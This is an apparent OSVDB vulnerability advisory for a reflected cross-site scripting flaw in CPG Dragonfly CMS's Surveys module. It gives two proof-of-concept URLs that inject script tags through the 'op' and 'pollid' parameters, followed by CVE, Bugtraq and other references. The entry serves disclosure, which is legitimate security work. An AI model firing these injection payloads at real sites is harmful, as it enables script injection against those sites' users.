CPG Dragonfly CMS Surveys Module Multiple Variable XSS

2006-02-22T07:17:34
ID OSVDB:23412
Type osvdb
Reporter OSVDB
Modified 2006-02-22T07:17:34

Description

Manual Testing Notes

http://[target]/index.php?name=Surveys&op=results"><script>alert()</script>pollid=3 http://[target]/index.php?name=Surveys&op=results&pollid=5"><script>alert()</script>

References:

Vendor URL: http://dragonflycms.org/ Security Tracker: 1015661 Secunia Advisory ID:18940 Related OSVDB ID: 23408 Related OSVDB ID: 23410 Related OSVDB ID: 23409 Related OSVDB ID: 23411 Related OSVDB ID: 23413 Related OSVDB ID: 23414 Related OSVDB ID: 23415 Other Advisory URL: http://lostmon.blogspot.com/2006/02/multiple-cross-site-scripting-in.html FrSIRT Advisory: ADV-2006-0688 CVE-2006-1033 Bugtraq ID: 16784